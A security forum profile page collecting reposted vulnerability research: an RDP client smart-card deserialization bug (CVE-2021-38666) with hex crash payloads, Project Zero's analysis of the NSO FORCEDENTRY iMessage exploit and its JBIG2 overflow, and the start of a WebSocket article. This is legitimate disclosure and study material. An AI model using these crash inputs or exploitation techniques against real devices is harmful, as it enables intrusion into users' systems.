Jump to content

Nytro

Administrators
  • Posts

    18582
  • Joined

  • Last visited

  • Days Won

    643

Posts posted by Nytro

  1. Sunt mai multe solutii online dar nu par sa functioneze prea bine.

    Solutia ar fi manuala, sa inlocuiesti anumite apeluri de functii cu "document.write" sau o alta metoda care in loc sa execute sa afiseze ce umreaza sa execute.

    Codul este destul de mare si complex, ar dura ceva dar nu e tocmai imposibil. 

    • Thanks 1
  2. Remote Deserialization Bug in Microsoft's RDP Client through Smart Card Extension (CVE-2021-38666)

    This is the third installment in my three-part series of articles on fuzzing Microsoft’s RDP client, where I explain a bug I found by fuzzing the smart card extension.

    Other articles in this series:

    Table of Contents

    Introduction

    The Remote Desktop Protocol (RDP) is a proprietary protocol designed by Microsoft which allows the user of an RDP client software to connect to a remote computer over the network with a graphical interface. Its use around the world is very widespread; some people, for instance, use it often for remote work and administration.

    Most of vulnerability research is concentrated on the RDP server. However, some critical vulnerabilities have also been found in the past in the RDP client, which would allow a compromised server to attack a client that connects to it.

    At Blackhat Europe 2019, a team of researchers showed they found an RCE in the RDP client. Their motivation was that North Korean hackers would alledgely carry out attacks through RDP servers acting as proxies, and that you could hack them back by setting up a malicious RDP server to which they would connect.

    During my internship at Thalium, I spent time studying and reverse engineering Microsoft RDP, learning about fuzzing, and looking for vulnerabilities.

    In this article, I will explain how I found a deserialization bug in the Microsoft RDP client, but for which I unfortunately couldn’t provide an actual proof of concept.

    If you are interested in details about the Remote Desktop Protocol, reversing the Microsoft RDP client or fuzzing methodology, I invite you to read my first article which tackles these subjects.

    Either way, I will briefly provide some context required to understand this article:

    • The target is Microsoft’s official RDP client on Windows 10.
    • Executable is mstsc.exe (in system32), but the main DLL for most of the client logic is mstscax.dll.
    • RDP uses the abstraction of virtual channels, a layer for transporting data.
      • For instance, the channel RDPSND is used for audio redirection, and the channel CLIPRDR is used for clipboard synchronization.
    • Each channel behaves according to separate logic and its own protocol, which official specification can often be found in Microsoft docs.
    • Virtual channels are a great attack surface and a good entrypoint for fuzzing.
    • I fuzzed virtual channels with a modified version of WinAFL and a network-level harness.

    Fuzzing RDPDR, the File System Virtual Channel Extension

    RDPDR is the name of the static virtual channel which purpose is to redirect access from the server to the client file system. It is also the base channel that hosts several sub-extensions such as the smart card extension, the printing extension or the serial/parallel ports extension.

    RDPDR is one of the few channels that are opened by default in the RDP client, alongside other static channels RDPSND, CLIPRDR, DRDYNVC. This makes it an even more interesting target risk-wise.

    Microsoft has some nice documentation on this channel. It contains the different PDU types, their structures, and even dozens of examples of PDUs which is great for seeding our fuzzer.

    Fuzzing RDPDR yielded a few small bugs, as well as another bug for which I got a CVE (see my previous article: Remote ASLR Leak in Microsoft’s RDP Client through Printer Cache Registry).

    The bug detailed in this article is one of the denser bugs I’ve had to deal with among my RDP findings. It was found by analyzing crashes that I got during fuzzing. It may sound obvious, but it’s actually not; for instance, the previous vulnerability I found had no crash associated to it :)

    Analyzing crashes

    The crashes happened while fuzzing the Smart Card sub-protocol, and were quite… enigmatic.

     

    RDPDR enigmatic crashes Perplexing logs of crashes while fuzzing RDPDR

     

    There were a lot of crashes, in many different modules, and also (not showed on screenshot) in mstscax.dll. In fact, there were way too many crashes at random places for all of this to make any sense, so I thought something was broken with my fuzzing.

    Although, one crash seemed to reoccur more frequently inside RPCRT4.DLL. We’ve gotten a tiny glimpse of RPC while investigating DRDYNVC in the first article, but it’s gonna get more serious now.

    Smart Cards and RPC

    The crashes in RPCRT4.DLL arise in NdrSimpleTypeConvert+0x307:

    mov     eax, [rdx] ; crash
    bswap   eax
    mov     [rdx], eax
    

    It’s a classic out-of-bounds read on what seems to be the byteswap of a DWORD in the heap.

    Fortunately, we are able to find the associated payload and instantly reproduce the bug. Here’s what the call stack looks like when the crash occurs:

     

    RPC bug call stack Call stack at time of the crash in RPCRT4.DLL

     

    So before entering RPCRT4.DLL, we were in mstscax!W32SCard::LocateCardsByATRA. But actually, if we also analyze other payloads that lead to the same crash, the call stack will interestingly point out other functions in mstscax.dll, such as:

    • W32SCard::HandleContextAndTwoStringCallWithLongReturn
    • W32SCard::WriteCache
    • W32SCard::DecodeContextAndStringCallW

    What’s with all of these? Here’s one thing all these functions have in common: the following snippet of code.

    v6 = MesDecodeBufferHandleCreate(
      &PDU->InputBuffer,
      PDU->InputBufferLength,
      &pHandle
    );
    // ...
    NdrMesTypeDecode3(
      pHandle,
      &pPicklingInfo,
      &pProxyInfo,
      (const unsigned int **)&ArrTypeOffset,
      0xEu,
      &pObject
    ); // Crash here
    

    The only thing that varies across these functions is the fifth parameter of NdrMesTypeDecode3 (the 0xE). We also immediately notice that PDU->InputBufferLength (DWORD) can be arbitrarily large…

    Before going any further, let’s dissect two of the guilty payloads as well.

    rpc-crash-1
    
    72 44 52 49 01 00 00 00 f8 01 02 00 08 00 00 00 0e 00 00 00 00 00 00 00 DeviceIoRequest
    00 40 00 00 OutputBufferLength
    00 80 2d 00 InputBufferLength
    e8 00 09 00 IoControlCode
    00 00 00 00 00 00 00 00 00 00 00 00 02 00 00 00 02 00 08 00 Padding
    InputBuffer
    01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
    00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00
    00 00 00 00 00 00 00 00 00 03 00 08 00 01 40 00
    00 16 00 00 00 01 00 00 00 
    
    rpc-crash-2
    
    72 44 52 49 01 00 00 00 f8 00 00 00 04 10 00 00 0e 00 00 00 00 00 00 00 DeviceIoRequest
    00 40 00 00 OutputBufferLength
    6f 63 06 00 InputBufferLength
    64 00 09 00 IoControlCode
    00 00 ff 00 00 00 00 40 00 20 00 66 00 00 77 66 64 63 08 00 Padding
    InputBuffer
    01 00 00 00 00 00 00 00 00 00 00 04 00 00 00 0e
    00 00 00 00 00 00 00 00 40 00 00 6f 63 06 00 64
    00 09 00 00 00 ff 00 00 00 00 40 00 00 00 00 00
    00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00
    00 00 00 00 6c 00 00 05
    

    So those are Device I/O Request PDUs, more specifically of sub-type Device Control Request. We already met one in the first article, in the arbitrary malloc bug.

    But what is this IoControlCode field exactly? According to the specification:

    IoControlCode (4 bytes): A 32-bit unsigned integer. This field is specific to the redirected device.

    Specific to the redirected device… For some reason, it took me a long time to realize there was actually a dedicated specification for the Smart Card sub-protocol (as well as the others).

    The section 3.1.4 of the Smart Card specification answers our suspicion. It contains a long table that maps IoControlCode values with types of IRP_MJ_DEVICE_CONTROL requests and associated structures.

    IoControlCode table

    Therefore, there are around 60 functions that contain the same pattern of code using MesDecodeBufferHandleCreate followed by NdrMesTypeDecode3. They are all called the same way with our InputBuffer and InputBufferLength — only a certain offset parameter varies each time.

    According to the specification, for IoControlCode set to 0x000900E8, we get the following LocateCardsByATRA_Call structure:

    typedef struct _LocateCardsByATRA_Call {
      REDIR_SCARDCONTEXT Context;
      [range(0,1000)] unsigned long cAtrs;
      [size_is(cAtrs)] LocateCards_ATRMask* rgAtrMasks;
      [range(0,10)] unsigned long cReaders;
      [size_is(cReaders)] ReaderStateA* rgReaderStates;
    } LocateCardsByATRA_Call;
    

    It seems then that based on IoControlCode, our input buffer will be decoded according to a certain structure.

    The RPC NDR marshaling engine

    Let’s come back on the decoding piece of code:

    v6 = MesDecodeBufferHandleCreate(
      &PDU->InputBuffer,
      PDU->InputBufferLength,
      &pHandle
    );
    

    This function from RPCRT4 is documented by Microsoft:

    The MesDecodeBufferHandleCreate function creates a decoding handle and initializes it for a (fixed) buffer style of serialization.

    So this is what it is all about… RPC has its own serialization engine, called the NDR marshaling engine (Network Data Representation). In particular, there is documentation on how data serialization works: header, format strings, types, etc.

    The RDP client makes “manual” use of the RPC NDR serialization engine to decode structures from the PDUs.

    After having initialized the decoding handle with the input buffer and length, the data is effectively deserialized:

    NdrMesTypeDecode3(
      pHandle,
      &pPicklingInfo,
      &pProxyInfo,
      (const unsigned int **)&ArrTypeOffset,
      0xEu,
      &pObject
    ); 
    

    And to our surprise… the function NdrMesTypeDecode3 is nowhere to be documented! The reason is because developers are not supposed to use this function directly.

    Instead, one should describe structures using Microsoft’s IDL (Interface Description Language). Next, the MIDL compiler should be used to generate stubs that can encode and decode data (using the NdrMes functions underneath).

    Nonetheless, header files contain information about the parameters and their types that can help us understand a bit more.

     

    NdrMesTypeDecode3 Interesting fields inside NdrMesTypeDecode3's arguments... (pProxyInfo)

     

    In particular, the pProxyInfo argument eventually leads to a Format field. It seems to contain a compiled description of all the types that exist and are used within the Smart Card extension.

    Then, the ArrTypeOffset array, which starts like this: 0x02, 0x1e, 0x1e, 0x54, ..., lists the offsets of all the structures of interest inside the compiled format string. The next argument (0xE) is the offset, in the ArrTypeOffset array, of the structure we want to consider.

    For LocateCardsByATRA, 0xE gives an offset of 0x220 in the ArrTypeOffset array, which points to the compiled format associated to the structure we found earlier in the specification:

    typedef struct _LocateCardsByATRA_Call {
      REDIR_SCARDCONTEXT Context;
      [range(0,1000)] unsigned long cAtrs;
      [size_is(cAtrs)] LocateCards_ATRMask* rgAtrMasks;
      [range(0,10)] unsigned long cReaders;
      [size_is(cReaders)] ReaderStateA* rgReaderStates;
    } LocateCardsByATRA_Call;
    

    We are lucky the specification tells us everything about the type structures, and even releases the full IDL in appendix. If we didn’t have these, we would have had to decompile the format ourselves, and not only the format pointed by the offset we found. Indeed, there are also many references to other previously defined structures, such as LocateCards_ATRMask.

    Root cause

    This may be getting a bit hard to follow, so let’s summarize what we understand for now:

    • We can send an IoControlCode, InputBuffer and InputBufferLength.
    • The InputBufferLength (DWORD) can be greater than the actual length of InputBuffer.
    • The input buffer will be deserialized (through the RPC NDR marshaling engine) according to a structure that varies with IoControlCode.
    • There are around 60 possible IoControlCode values, and thus decoding structures.
    • There’s an OOB read during the deserialization process, in a certain function NdrSimpleTypeConvert.

    Now as I was reversing and debugging, it seemed to me that these “convert” operations actually took place before any real decoding per se. It was as if before deserializing, there was a first pass on the whole buffer to convert stuff.

    I eventually found a Windows XP source leak that helped shed light on all of this:

    void NdrSimpleTypeConvert(PMIDL_STUB_MESSAGE pStubMsg, uchar FormatChar) {
      switch (FormatChar) {
        // ...
        case FC_ULONG:
          ALIGN(pStubMsg->Buffer,3);
          CHECK_EOB_RAISE_BSD( pStubMsg->Buffer + 4 );
    
          if ((pStubMsg->RpcMsg->DataRepresentation & NDR_INT_REP_MASK) != NDR_LOCAL_ENDIAN) {
            *((ulong *)pStubMsg->Buffer) = RtlUlongByteSwap(*(ulong *)pStubMsg->Buffer);  
          }
    
          pStubMsg->Buffer += 4;
          break;
        // ...
      }
    }
    

    The magic happens when the endianness of the serialized data does not match with the local endianness. A pass on the buffer is performed to switch the endianness of (in particular) all the FC_ULONG type fields (the unsigned long fields in our structure).

    Therefore, in the _LocateCardsByATRA_Call structure, the fields cAtrs and cReaders are byteswapped. But also and more importantly, any unsigned long that lies inside the nested rgAtrMasks or rgReaderStates fields will be byteswapped. And these fields are arrays of structs which size we control!

    So there are actually two kinds of overruns here:

    • the user-supplied PDU->InputBufferLength is not properly checked, so the conversion pass in the RPC NDR deserialization will go way beyond the end of the PDU in the heap;
    • the user-supplied cAtrs (or cReaders) that is coded inside the serialized data can be large enough to make the deserialization structure overflow the actual length of the buffer, along with the input buffer length we provided.

    Combined, these overruns result in an out-of-bounds read in the heap, and thus a crash.

    Heap corruption

    We managed to clear up why we got crashes in RPCRT4.DLL, and which payloads triggered them. However, we haven’t found yet an explanation to the tons of other nonsensical crashes we’ve had.

    Let’s check the LocateCards_ATRMask structure, that is nested inside LocateCardsByATRA_Call:

    typedef struct _LocateCards_ATRMask {
      [range(0, 36)] unsigned long cbAtr;
      byte rgbAtr[36];
      byte rgbMask[36];
    } LocateCards_ATRMask;
    

    There’s an unsigned long field (cbAtr) at the beginning of this struct of total size 76 bytes. Therefore, we may be able to perform byteswaps of DWORDs in the heap every 76 bytes!

    We can confirm this by setting a breakpoint where the byteswap occurs and watching the heap progressively getting disfigured.

    Since the PDU->InputBufferLength variable is arbitrarily large, we can, as we said, eventually reach the end of the heap segment to cause an OOB read crash. But this is not the interesting thing here.

    By byteswapping DWORDs in the heap, we are corrupting a lot of objects. If the input buffer length is large enough to allow out-of-bounds operations, but small enough not to exceed the heap segment, the deserialization process will return with a damaged heap. This leads to numerous types of crashes; all the odd unexplained crashes that I encountered earlier.

    • Heap Corruption exceptions during heap management calls
    • Random pointers being damaged and causing access violations
    • Damaged vtable pointers causing access violations
    • Damaged vtable pointers that still successfully resolve and redirect the execution flow, of course directly crashing after (illegal instruction)
      • The “unknown module” crashes I found earlier!

    Exploitation

    I suspect some of these behaviors could be exploited to achieve unexpected harmful results such as remote code execution.

    For instance, I thought that with some heap spray, one could manage to hijack a vtable through a well-aligned byteswap and redirect the execution flow. But it seemed quite tricky to carry out and I did not manage to exploit it myself.

    There may also be other repercussions of this deserialization bug. I saw that there were other kinds of conversions that could be performed: float conversions, EBCDIC <-> ASCII… but I’m not sure whether it is actually possible to trigger them.

    Reporting to Microsoft

    At first, I was hesitant about whether I should report this to MSRC or not. Indeed, I was very unsure about this bug’s exploitability, which seemed to me like it would be very intricate and relying on a lot of luck.

    Moreover, by submitting it, I would have to tag it as Remote Code Execution, which I thought would be a bold move without any proof of concept.

    I still reported it to MSRC, and rightfully so, as it was assessed Remote Code Execution with Critical severity and awarded a $5,000 bounty!

    In conclusion, don’t be afraid to submit bugs even if you lack proof of exploitation. As long as you have a very detailed explanation of the bug, a good understanding of the root cause and a decent analysis of the risks that come with it, it can be acknowledged and awarded.

    The exploitation process can sometimes require a lot of skill and creativity, and you can always tell yourself that even if you can’t exploit your own bug, there may be an evil super hacker out there that would manage to exploit it — better be safe than sorry.

    Disclosure Timeline

    • 2021-07-22 — Sent vulnerability report to MSRC (Microsoft Security Response Center)
    • 2021-07-23 — Microsoft started reviewing and reproducing
    • 2021-07-31 — Microsoft acknowledged the vulnerability and started developing a fix. They also started reviewing this case for a potential bounty award.
    • 2021-08-04 — Microsoft assessed the vulnerability as Remote Code Execution with Important severity. Bounty award: $5,000.
    • 2021-08-13 — The vulnerability was assigned CVE-2021-38666.
    • 2021-11-09 — Microsoft released the security patch. For some reason, the severity was revised to Critical when the CVE was published.
  3. A deep dive into an NSO zero-click iMessage exploit: Remote Code Execution

     

    Posted by Ian Beer & Samuel Groß of Google Project Zero

     

    We want to thank Citizen Lab for sharing a sample of the FORCEDENTRY exploit with us, and Apple’s Security Engineering and Architecture (SEAR) group for collaborating with us on the technical analysis. The editorial opinions reflected below are solely Project Zero’s and do not necessarily reflect those of the organizations we collaborated with during this research.

     

    Earlier this year, Citizen Lab managed to capture an NSO iMessage-based zero-click exploit being used to target a Saudi activist. In this two-part blog post series we will describe for the first time how an in-the-wild zero-click iMessage exploit works.

     

    Based on our research and findings, we assess this to be one of the most technically sophisticated exploits we've ever seen, further demonstrating that the capabilities NSO provides rival those previously thought to be accessible to only a handful of nation states.

     

    The vulnerability discussed in this blog post was fixed on September 13, 2021 in iOS 14.8 as CVE-2021-30860.

     

    NSO

     

    NSO Group is one of the highest-profile providers of "access-as-a-service", selling packaged hacking solutions which enable nation state actors without a home-grown offensive cyber capability to "pay-to-play", vastly expanding the number of nations with such cyber capabilities.

     

    For years, groups like Citizen Lab and Amnesty International have been tracking the use of NSO's mobile spyware package "Pegasus". Despite NSO's claims that they "[evaluate] the potential for adverse human rights impacts arising from the misuse of NSO products" Pegasus has been linked to the hacking of the New York Times journalist Ben Hubbard by the Saudi regimehacking of human rights defenders in Morocco and Bahrainthe targeting of Amnesty International staff and dozens of other cases.

     

    Last month the United States added NSO to the "Entity List", severely restricting the ability of US companies to do business with NSO and stating in a press release that "[NSO's tools] enabled foreign governments to conduct transnational repression, which is the practice of authoritarian governments targeting dissidents, journalists and activists outside of their sovereign borders to silence dissent."

     

    Citizen Lab was able to recover these Pegasus exploits from an iPhone and therefore this analysis covers NSO's capabilities against iPhone. We are aware that NSO sells similar zero-click capabilities which target Android devices; Project Zero does not have samples of these exploits but if you do, please reach out.

     

    From One to Zero

     

    In previous cases such as the Million Dollar Dissident from 2016, targets were sent links in SMS messages:

     

     

    AVvXsEgzqxpl0250IinIsgxGQRKF09QzU4pN0h8W

    Screenshots of Phishing SMSs reported to Citizen Lab in 2016

    source: https://citizenlab.ca/2016/08/million-dollar-dissident-iphone-zero-day-nso-group-uae/

     

    The target was only hacked when they clicked the link, a technique known as a one-click exploit. Recently, however, it has been documented that NSO is offering their clients zero-click exploitation technology, where even very technically savvy targets who might not click a phishing link are completely unaware they are being targeted. In the zero-click scenario no user interaction is required. Meaning, the attacker doesn't need to send phishing messages; the exploit just works silently in the background. Short of not using a device, there is no way to prevent exploitation by a zero-click exploit; it's a weapon against which there is no defense.

     

    One weird trick

     

    The initial entry point for Pegasus on iPhone is iMessage. This means that a victim can be targeted just using their phone number or AppleID username.

     

    iMessage has native support for GIF images, the typically small and low quality animated images popular in meme culture. You can send and receive GIFs in iMessage chats and they show up in the chat window. Apple wanted to make those GIFs loop endlessly rather than only play once, so very early on in the iMessage parsing and processing pipeline (after a message has been received but well before the message is shown), iMessage calls the following method in the IMTranscoderAgent process (outside the "BlastDoor" sandbox), passing any image file received with the extension .gif:

     

      [IMGIFUtils copyGifFromPath:toDestinationPath:error]

     

    Looking at the selector name, the intention here was probably to just copy the GIF file before editing the loop count field, but the semantics of this method are different. Under the hood it uses the CoreGraphics APIs to render the source image to a new GIF file at the destination path. And just because the source filename has to end in .gif, that doesn't mean it's really a GIF file.

     

    The ImageIO library, as detailed in a previous Project Zero blogpost, is used to guess the correct format of the source file and parse it, completely ignoring the file extension. Using this "fake gif" trick, over 20 image codecs are suddenly part of the iMessage zero-click attack surface, including some very obscure and complex formats, remotely exposing probably hundreds of thousands of lines of code.

     

    Note: Apple inform us that they have restricted the available ImageIO formats reachable from IMTranscoderAgent starting in iOS 14.8.1 (26 October 2021), and completely removed the GIF code path from IMTranscoderAgent starting in iOS 15.0 (20 September 2021), with GIF decoding taking place entirely within BlastDoor.

     

    A PDF in your GIF

     

    NSO uses the "fake gif" trick to target a vulnerability in the CoreGraphics PDF parser.

     

    PDF was a popular target for exploitation around a decade ago, due to its ubiquity and complexity. Plus, the availability of javascript inside PDFs made development of reliable exploits far easier. The CoreGraphics PDF parser doesn't seem to interpret javascript, but NSO managed to find something equally powerful inside the CoreGraphics PDF parser...

     

    Extreme compression

     

    In the late 1990's, bandwidth and storage were much more scarce than they are now. It was in that environment that the JBIG2 standard emerged. JBIG2 is a domain specific image codec designed to compress images where pixels can only be black or white.

     

    It was developed to achieve extremely high compression ratios for scans of text documents and was implemented and used in high-end office scanner/printer devices like the XEROX WorkCenter device shown below. If you used the scan to pdf functionality of a device like this a decade ago, your PDF likely had a JBIG2 stream in it.AVvXsEjWZdMTUZfcCmxvlf99Hl9jE1A8OcfR-sD3

    A Xerox WorkCentre 7500 series multifunction printer, which used JBIG2

    for its scan-to-pdf functionality

    source: https://www.office.xerox.com/en-us/multifunction-printers/workcentre-7545-7556/specifications

     

    The PDFs files produced by those scanners were exceptionally small, perhaps only a few kilobytes. There are two novel techniques which JBIG2 uses to achieve these extreme compression ratios which are relevant to this exploit:

     

    Technique 1: Segmentation and substitution

     

    Effectively every text document, especially those written in languages with small alphabets like English or German, consists of many repeated letters (also known as glyphs) on each page. JBIG2 tries to segment each page into glyphs then uses simple pattern matching to match up glyphs which look the same:

     

    AVvXsEh6iNZLjmFtsjnVl7fWtG-Kq-TEw3azo1lw

    Simple pattern matching can find all the shapes which look similar on a page,

    in this case all the 'e's

     

    JBIG2 doesn't actually know anything about glyphs and it isn't doing OCR (optical character recognition.) A JBIG encoder is just looking for connected regions of pixels and grouping similar looking regions together. The compression algorithm is to simply substitute all sufficiently-similar looking regions with a copy of just one of them:

     

     

    AVvXsEgxM5VTCT6dKeMRITKT6kQDsQue8Py7eRGU

    Replacing all occurrences of similar glyphs with a copy of just one often yields a document which is still quite legible and enables very high compression ratios

     

    In this case the output is perfectly readable but the amount of information to be stored is significantly reduced. Rather than needing to store all the original pixel information for the whole page you only need a compressed version of the "reference glyph" for each character and the relative coordinates of all the places where copies should be made. The decompression algorithm then treats the output page like a canvas and "draws" the exact same glyph at all the stored locations.

     

    There's a significant issue with such a scheme: it's far too easy for a poor encoder to accidentally swap similar looking characters, and this can happen with interesting consequences. D. Kriesel's blog has some motivating examples where PDFs of scanned invoices have different figures or PDFs of scanned construction drawings end up with incorrect measurements. These aren't the issues we're looking at, but they are one significant reason why JBIG2 is not a common compression format anymore.

     

    Technique 2: Refinement coding

     

    As mentioned above, the substitution based compression output is lossy. After a round of compression and decompression the rendered output doesn't look exactly like the input. But JBIG2 also supports lossless compression as well as an intermediate "less lossy" compression mode.

     

    It does this by also storing (and compressing) the difference between the substituted glyph and each original glyph. Here's an example showing a difference mask between a substituted character on the left and the original lossless character in the middle:

     

    AVvXsEiJn4fCqItjd3bgJ_re3nMHB4aFgaR-17H6

    Using the XOR operator on bitmaps to compute a difference image

     

    In this simple example the encoder can store the difference mask shown on the right, then during decompression the difference mask can be XORed with the substituted character to recover the exact pixels making up the original character. There are some more tricks outside of the scope of this blog post to further compress that difference mask using the intermediate forms of the substituted character as a "context" for the compression.

     

    Rather than completely encoding the entire difference in one go, it can be done in steps, with each iteration using a logical operator (one of AND, OR, XOR or XNOR) to set, clear or flip bits. Each successive refinement step brings the rendered output closer to the original and this allows a level of control over the "lossiness" of the compression. The implementation of these refinement coding steps is very flexible and they are also able to "read" values already present on the output canvas.

     

    A JBIG2 stream

     

    Most of the CoreGraphics PDF decoder appears to be Apple proprietary code, but the JBIG2 implementation is from Xpdf, the source code for which is freely available.

     

    The JBIG2 format is a series of segments, which can be thought of as a series of drawing commands which are executed sequentially in a single pass. The CoreGraphics JBIG2 parser supports 19 different segment types which include operations like defining a new page, decoding a huffman table or rendering a bitmap to given coordinates on the page.

     

    Segments are represented by the class JBIG2Segment and its subclasses JBIG2Bitmap and JBIG2SymbolDict.

     

    A JBIG2Bitmap represents a rectangular array of pixels. Its data field points to a backing-buffer containing the rendering canvas.

     

    A JBIG2SymbolDict groups JBIG2Bitmaps together. The destination page is represented as a JBIG2Bitmap, as are individual glyphs.

     

    JBIG2Segments can be referred to by a segment number and the GList vector type stores pointers to all the JBIG2Segments. To look up a segment by segment number the GList is scanned sequentially.

     

    The vulnerability

     

    The vulnerability is a classic integer overflow when collating referenced segments:

     

      Guint numSyms; // (1)

     

      numSyms = 0;

      for (i = 0; i < nRefSegs; ++i) {

        if ((seg = findSegment(refSegs[i]))) {

          if (seg->getType() == jbig2SegSymbolDict) {

            numSyms += ((JBIG2SymbolDict *)seg)->getSize();  // (2)

          } else if (seg->getType() == jbig2SegCodeTable) {

            codeTables->append(seg);

          }

        } else {

          error(errSyntaxError, getPos(),

                "Invalid segment reference in JBIG2 text region");

          delete codeTables;

          return;

        }

      }

    ...

      // get the symbol bitmaps

      syms = (JBIG2Bitmap **)gmallocn(numSyms, sizeof(JBIG2Bitmap *)); // (3)

     

      kk = 0;

      for (i = 0; i < nRefSegs; ++i) {

        if ((seg = findSegment(refSegs[i]))) {

          if (seg->getType() == jbig2SegSymbolDict) {

            symbolDict = (JBIG2SymbolDict *)seg;

            for (k = 0; k < symbolDict->getSize(); ++k) {

              syms[kk++] = symbolDict->getBitmap(k); // (4)

            }

          }

        }

      }

     

    numSyms is a 32-bit integer declared at (1). By supplying carefully crafted reference segments it's possible for the repeated addition at (2) to cause numSyms to overflow to a controlled, small value.

     

    That smaller value is used for the heap allocation size at (3) meaning syms points to an undersized buffer.

     

    Inside the inner-most loop at (4) JBIG2Bitmap pointer values are written into the undersized syms buffer.

     

    Without another trick this loop would write over 32GB of data into the undersized syms buffer, certainly causing a crash. To avoid that crash the heap is groomed such that the first few writes off of the end of the syms buffer corrupt the GList backing buffer. This GList stores all known segments and is used by the findSegments routine to map from the segment numbers passed in refSegs to JBIG2Segment pointers. The overflow causes the JBIG2Segment pointers in the GList to be overwritten with JBIG2Bitmap pointers at (4).

     

    Conveniently since JBIG2Bitmap inherits from JBIG2Segment the seg->getType() virtual call succeed even on devices where Pointer Authentication is enabled (which is used to perform a weak type check on virtual calls) but the returned type will now not be equal to jbig2SegSymbolDict thus causing further writes at (4) to not be reached and bounding the extent of the memory corruption.

     

     

    AVvXsEh3sDkZw8L9bJowGRjXcR-k0Qqwi_CaHYh7

    A simplified view of the memory layout when the heap overflow occurs showing the undersized-buffer below the GList backing buffer and the JBIG2Bitmap

     

    Boundless unbounding

     

    Directly after the corrupted segments GList, the attacker grooms the JBIG2Bitmap object which represents the current page (the place to where current drawing commands render).

     

    JBIG2Bitmaps are simple wrappers around a backing buffer, storing the buffer’s width and height (in bits) as well as a line value which defines how many bytes are stored for each line.

     

     

    AVvXsEjHv6_8ljNUlXsWATAbHBQPMakyH1pc3E3i

    The memory layout of the JBIG2Bitmap object showing the segnum, w, h and line fields which are corrupted during the overflow

     

    By carefully structuring refSegs they can stop the overflow after writing exactly three more JBIG2Bitmap pointers after the end of the segments GList buffer. This overwrites the vtable pointer and the first four fields of the JBIG2Bitmap representing the current page. Due to the nature of the iOS address space layout these pointers are very likely to be in the second 4GB of virtual memory, with addresses between 0x100000000 and 0x1ffffffff. Since all iOS hardware is little endian (meaning that the w and line fields are likely to be overwritten with 0x1 — the most-significant half of a JBIG2Bitmap pointer) and the segNum and h fields are likely to be overwritten with the least-significant half of such a pointer, a fairly random value depending on heap layout and ASLR somewhere between 0x100000 and 0xffffffff.

     

    This gives the current destination page JBIG2Bitmap an unknown, but very large, value for h. Since that h value is used for bounds checking and is supposed to reflect the allocated size of the page backing buffer, this has the effect of "unbounding" the drawing canvas. This means that subsequent JBIG2 segment commands can read and write memory outside of the original bounds of the page backing buffer.

     

    The heap groom also places the current page's backing buffer just below the undersized syms buffer, such that when the page JBIG2Bitmap is unbounded, it's able to read and write its own fields:

     

     

     

    AVvXsEgkSlYnjoMsv5mHOKQARzrvGqPICZEqlS44

    The memory layout showing how the unbounded bitmap backing buffer is able to reference the JBIG2Bitmap object and modify fields in it as it is located after the backing buffer in memory

     

    By rendering 4-byte bitmaps at the correct canvas coordinates they can write to all the fields of the page JBIG2Bitmap and by carefully choosing new values for w, h and line, they can write to arbitrary offsets from the page backing buffer.

     

    At this point it would also be possible to write to arbitrary absolute memory addresses if you knew their offsets from the page backing buffer. But how to compute those offsets? Thus far, this exploit has proceeded in a manner very similar to a "canonical" scripting language exploit which in Javascript might end up with an unbounded ArrayBuffer object with access to memory. But in those cases the attacker has the ability to run arbitrary Javascript which can obviously be used to compute offsets and perform arbitrary computations. How do you do that in a single-pass image parser?

     

    My other compression format is turing-complete!

     

    As mentioned earlier, the sequence of steps which implement JBIG2 refinement are very flexible. Refinement steps can reference both the output bitmap and any previously created segments, as well as render output to either the current page or a segment. By carefully crafting the context-dependent part of the refinement decompression, it's possible to craft sequences of segments where only the refinement combination operators have any effect.

     

    In practice this means it is possible to apply the AND, OR, XOR and XNOR logical operators between memory regions at arbitrary offsets from the current page's JBIG2Bitmap backing buffer. And since that has been unbounded… it's possible to perform those logical operations on memory at arbitrary out-of-bounds offsets:

     

     

    AVvXsEiJHLjuE1TzkQPJYrSalZ3JL9ZlBfrdmXl_

    The memory layout showing how logical operators can be applied out-of-bounds

     

    It's when you take this to its most extreme form that things start to get really interesting. What if rather than operating on glyph-sized sub-rectangles you instead operated on single bits?

     

    You can now provide as input a sequence of JBIG2 segment commands which implement a sequence of logical bit operations to apply to the page. And since the page buffer has been unbounded those bit operations can operate on arbitrary memory.

     

    With a bit of back-of-the-envelope scribbling you can convince yourself that with just the available AND, OR, XOR and XNOR logical operators you can in fact compute any computable function - the simplest proof being that you can create a logical NOT operator by XORing with 1 and then putting an AND gate in front of that to form a NAND gate:

     

     

    AVvXsEgU2PbU_PLrLOH1W-ZuOIC0aR5iOEt3iJon

    An AND gate connected to one input of an XOR gate. The other XOR gate input is connected to the constant value 1 creating an NAND.

     

    A NAND gate is an example of a universal logic gate; one from which all other gates can be built and from which a circuit can be built to compute any computable function.

     

    Practical circuits

     

    JBIG2 doesn't have scripting capabilities, but when combined with a vulnerability, it does have the ability to emulate circuits of arbitrary logic gates operating on arbitrary memory. So why not just use that to build your own computer architecture and script that!? That's exactly what this exploit does. Using over 70,000 segment commands defining logical bit operations, they define a small computer architecture with features such as registers and a full 64-bit adder and comparator which they use to search memory and perform arithmetic operations. It's not as fast as Javascript, but it's fundamentally computationally equivalent.

     

    The bootstrapping operations for the sandbox escape exploit are written to run on this logic circuit and the whole thing runs in this weird, emulated environment created out of a single decompression pass through a JBIG2 stream. It's pretty incredible, and at the same time, pretty terrifying.

     

    In a future post (currently being finished), we'll take a look at exactly how they escape the IMTranscoderAgent sandbox.

     

    Sursa: https://googleprojectzero.blogspot.com/2021/12/a-deep-dive-into-nso-zero-click.html

    • Upvote 1
  4. Websocket: common vulnerabilities plaguing it and managing them.

    • Home 
    • Cybersecurity 
    • Websocket: common vulnerabilities plaguing it and managing them.
    Published by  Surendiran S at  December 17, 2021
    Websocket-common-vulnerabilities

    What is WebSocket?

    • Efficient two-way communication protocol
    • WebSocket is stateful where HTTP is stateless
    • Two main parts: Handshake and data transfer

    WebSockets allows the client/server to create a bidirectional communication channel. Then the client and server communicate asynchronously, and messages can be sent in either direction.

    WebSockets are particularly useful in situations where low-latency or server-initiated messages are required, such as real-time feeds of data, online chat applications, message boards, web interfaces, and commercial applications.

    The format of a WebSocket URL:

    ws://redacted.com used for unencrypted connection

    wss://redacted.com used for a secure SSL connection

    The browser and server perform a WebSocket handshake using HTTP to connect. The browser issues a WebSocket handshake request, and if the server accepts the connection then, it returns a WebSocket handshake response. After the response, the network connection remains open and can be used to send WebSocket messages in both directions.

